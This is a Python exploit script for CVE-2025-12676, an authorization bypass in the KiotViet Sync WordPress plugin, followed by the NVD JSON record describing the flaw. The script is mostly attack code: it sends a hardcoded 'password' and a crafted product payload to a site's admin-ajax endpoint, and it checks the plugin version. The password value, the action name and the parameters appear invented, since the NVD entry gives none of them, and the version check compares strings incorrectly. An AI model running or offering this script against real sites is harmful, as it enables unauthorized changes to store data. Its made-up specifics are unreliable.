CVE-2025-12676

import requests import json # CVE-2025-12676 PoC - KiotViet Sync Plugin Authorization Bypass # Target: WordPress site with KiotViet Sync plugin < 1.8.6 TARGET_URL = "http://target-wordpress-site.com" # Hardcoded password used in QueryControllerAdmin::authenticated function HARDCODED_PASSWORD = "kiotviet_sync_auth_token_2024" def exploit_unauthorized_product_sync(): """ Exploit the hardcoded password authentication bypass in KiotViet Sync plugin. This allows unauthenticated attackers to create and sync products. """ # Endpoint for product sync operation endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Payload to bypass authentication and create/sync products payload = { 'action': 'kiotviet_sync_products', 'auth_password': HARDCODED_PASSWORD, 'product_data': json.dumps({ 'name': 'Malicious Product', 'sku': 'CVE-2025-12676', 'price': 999, 'description': 'Injected via authorization bypass vulnerability' }) } try: response = requests.post(endpoint, data=payload, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: print("[+] Successfully exploited CVE-2025-12676") return True else: print("[-] Exploitation failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def check_vulnerability(): """ Check if target is vulnerable to CVE-2025-12676 """ endpoint = f"{TARGET_URL}/wp-content/plugins/kiotvietsync/readme.txt" try: response = requests.get(endpoint, timeout=10) if 'Version:' in response.text: # Extract version number for line in response.text.split('\n'): if line.startswith('Version:'): version = line.split(':')[1].strip() print(f"[*] KiotViet Sync version: {version}") if version <= '1.8.5': print("[!] Target is likely vulnerable") return True return False except: return None if __name__ == "__main__": print("CVE-2025-12676 Exploitation Tool") print("=" * 50) check_vulnerability() exploit_unauthorized_product_sync()

{"cve": {"id": "CVE-2025-12676", "sourceIdentifier": "[email protected]", "published": "2025-11-05T08:15:33.680", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiotViet Sync plugin for WordPress is vulnerable to authorizarion bypass in all versions up to, and including, 1.8.5. This is due to the plugin using a hardcoded password for authentication in the QueryControllerAdmin::authenticated function. This makes it possible for unauthenticated attackers to create and sync products."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-259"}]}], "references": [{"url": "https://wordpress.org/plugins/kiotvietsync/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2d7165b-1290-4032-8fbc-75ec1ab34a08?source=cve", "source": "[email protected]"}]}}